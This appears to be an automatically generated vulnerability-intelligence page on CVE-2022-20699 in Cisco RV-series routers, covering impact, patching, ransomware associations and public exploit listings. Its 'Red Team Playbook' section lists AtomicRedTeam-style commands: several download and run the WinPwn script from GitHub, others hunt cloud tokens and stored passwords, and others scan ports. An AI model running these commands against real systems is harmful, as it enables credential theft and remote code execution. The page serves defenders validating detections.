CVE-2022-20699
Overview
The vulnerabilities stem from multiple critical flaws including stack-based buffer overflows and improper authentication validation within the Cisco Small Business RV Series Router firmware. These issues arise from insufficient bounds checking and flawed access control mechanisms in the router's firmware components responsible for handling network requests and authentication processes. Affected components include the firmware modules managing SSL VPN, command execution interfaces, and privilege escalation routines.
Vulnerability Description
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An unauthenticated attacker can execute arbitrary code, escalate privileges, bypass authentication controls, and run unsigned software on affected routers. This enables full system compromise, including persistent control over network traffic and device configurations. Additionally, attackers can cause denial of service, disrupting network availability. No user interaction or valid credentials are required, making these vulnerabilities exploitable remotely and facilitating lateral movement within enterprise networks.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the Small Business RV Series Routers, detailed in advisory cisco-sa-smb-mult-vuln-KA9PK6D. Administrators should upgrade to the fixed firmware versions for RV160, RV260, RV340, and RV345 models as specified in the advisory. No alternative mitigations or workarounds are recommended; applying the vendor-supplied patches is the definitive remediation step. Refer to https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D for complete patching instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerabilities present in the Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers encompass a range of critical security flaws that can be exploited to compromise the integrity and confidentiality of the devices. These vulnerabilities allow an attacker to execute arbitrary code, elevate privileges, and bypass authentication mechanisms, among other malicious activities. The underlying issues stem from improper input validation and insufficient security controls within the router firmware. This lack of robust security measures creates a pathway for attackers to manipulate the device's functionality, potentially leading to unauthorized access and control over the network infrastructure.
Exploitation of these vulnerabilities can occur through various attack vectors, including remote access and local network exploitation. An attacker could leverage these flaws to send specially crafted requests to the router, triggering the execution of arbitrary commands or code. This could be achieved without the need for prior authentication, allowing unauthorized users to gain control over the device. Furthermore, the ability to fetch and run unsigned software poses a significant risk, as it enables the installation of malicious payloads that can further compromise the network. Denial of service attacks are also a concern, as they could render the routers inoperable, disrupting business operations and access to critical services.
The real-world impact of these vulnerabilities is substantial, particularly for small to medium-sized businesses that rely on these routers for their networking needs. A successful attack could lead to data breaches, loss of sensitive information, and significant financial repercussions. The potential for an attacker to gain administrative control over the network can result in unauthorized access to internal systems, exposing organizations to further threats and compliance violations. Additionally, the reputational damage associated with such breaches can have long-lasting effects on customer trust and business relationships.
To effectively detect and mitigate these vulnerabilities, organizations should implement a multi-layered security approach. Regular firmware updates are essential to patch known vulnerabilities and enhance the security posture of the devices. Network segmentation can also help limit the potential impact of an exploit by isolating critical systems from less secure devices. Employing intrusion detection systems can aid in identifying suspicious activities and potential exploit attempts, allowing for timely response measures. Furthermore, organizations should conduct regular security assessments and vulnerability scans to identify and address any weaknesses in their network infrastructure.
In conclusion, the vulnerabilities affecting Cisco's Small Business routers present significant risks that can lead to severe operational and financial consequences for organizations. Understanding the technical details, potential attack vectors, and real-world implications is crucial for developing effective detection and mitigation strategies. By prioritizing security measures and maintaining vigilance against emerging threats, businesses can better protect their networks and maintain the integrity of their operations.
Recent developments in the CVE-2022-20699 vulnerability landscape have led to an increase in its criticality, with the CVSS score being adjusted from 9.8 to a perfect 10.0. This change reflects the emergence of new proof-of-concept exploits and publicly available tools that significantly lower the barrier for attackers to successfully compromise affected Cisco Small Business RV Series routers. Our telemetry indicates a marked expansion in the exploit ecosystem, including a Metasploit module capable of delivering reliable remote code execution without authentication, which notably enhances the threat actor’s operational capabilities. Although the EPSS score shows a slight decrease, this is likely due to transient factors rather than a reduction in exploitability or attacker interest. The ransomware group Akira remains associated with this vulnerability, though no high-confidence ransomware campaigns have been linked to it to date. For defenders, this escalation underscores an urgent need to reassess exposure and monitoring strategies, as the availability of sophisticated exploitation frameworks increases the likelihood of opportunistic attacks. Consequently, the overall threat level has intensified, positioning CVE-2022-20699 as a critical priority within network security risk management frameworks.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Rv340 Firmware | All |
cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv340w Firmware | All |
cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345 Firmware | All |
cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345p Firmware | All |
cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
exploits/linux/misc/cisco_rv340_sslvpn
|
Pedro Ribeiro <[email protected]> | Unknown | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Audiobahn/CVE-2022-20699
Cisco Anyconnect VPN unauth RCE (rwx stack)
|
Audiobahn | 238 | 43 | 2022-02-07 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
puckiestyle/CVE-2022-20699
|
puckiestyle | 0 | 0 | 2022-02-10 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20699 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-22-414/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167113/Cisco-RV340-SSL-VPN-Unauthenticated-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20699 |